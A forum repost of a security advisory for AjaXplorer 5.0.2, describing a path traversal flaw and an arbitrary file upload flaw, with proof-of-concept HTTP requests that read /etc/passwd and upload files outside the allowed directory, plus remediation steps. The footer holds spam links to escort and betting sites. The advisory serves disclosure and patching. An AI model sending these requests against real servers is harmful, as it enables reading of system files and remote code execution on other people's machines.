AjaXplorer 5.0.2 Shell Upload / Traversal Vulnerability

Ens4R

Prof Spys-z
Katılım
9 Eki 2012
Mesajlar
1,642
Tepkime puanı
1
Puanları
0
Web sitesi
ajanlar.org
Vendor: AjaXplorer (http://ajaxplorer.info)
Product: AjaXplorer
Version affected: 5.0.2 and prior

Product description:
AjaXplorer is an open source file sharing platform which relies on PHP and
the web interface can run on various web server software, such as Apache
and Nginx.


Finding 1: Path Traversal
*****Credit: Vikas Singhal of Trustwave SpiderLabs
CVE: CVE-2013-5688
CWE: CWE-22

A path traversal vulnerability was found in the "edit" functionality of the application.
This vulnerability may allow an attacker to view files outside the website's root directory.

The following Proof of Concept (PoC) HTTP request illustrates the same.


#Request
1. GET /filemanagers/ajaxplorer/index.php?secure_token=[latest token]&get_action=download&dir=%2F&file=/%00../%00../%00../%00../%00../%00../%00../%00../%00../%00../etc/passwd HTTP/1.1

#Request
2. GET /filemanagers/ajaxplorer/index.php?secure_token=[latest token]&get_action=get_content&file=/%00../%00../%00../%00../%00../%00../%00../%00../%00../%00../etc/passwd HTTP/1.1

Finding 2: Arbitrary File Upload
*****Credit: Vikas Singhal of Trustwave SpiderLabs
CVE: CVE-2013-5689
CWE: CWE-434

Using the application's upload functionality it was possible to upload
arbitrary file outside the default directory and execute it. This may allow
an attacker to execute arbitrary commands on the web server.

Vulnerable HTTP request:

#Request
1. POST /filemanagers/ajaxplorer/index.php?secure_token=[latest token]&get_action=upload&xhr_uploader=true&dir=/%00../%00../data/ HTTP/1.1

Remediation Steps:
The vendor has released a fix to address these vulnerabilities.
Administrators should upgrade to AjaXplorer Core 5.0.3 or later.
Alternatively, administers can mitigate these vulnerabilities by applying
Web Application Firewall (WAF) rules. ModSecurity
(http://www.modsecurity.org/) has added rules to the commercial rules feed
for these issues, and WebDefend has protections as well.


Vendor Communication Timeline:
8/29/13 - Vulnerability disclosed
9/03/13 - Patch released by vendor
9/05/13 - Advisory published

References
1. http://ajaxplorer.info/ajaxplorer-core-5-0-3/

# 1E8F5F94E8CB65B1 1337day.com [2013-09-11] 863540B3DDE34DF7 #
 

mersin escort bodrum escort fethiye escort alanya escort konya escort marmaris escort bodrum escort vozol puff sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort ankara escort meritking giriş
Üst
Copyright® Ajanlar.org 2012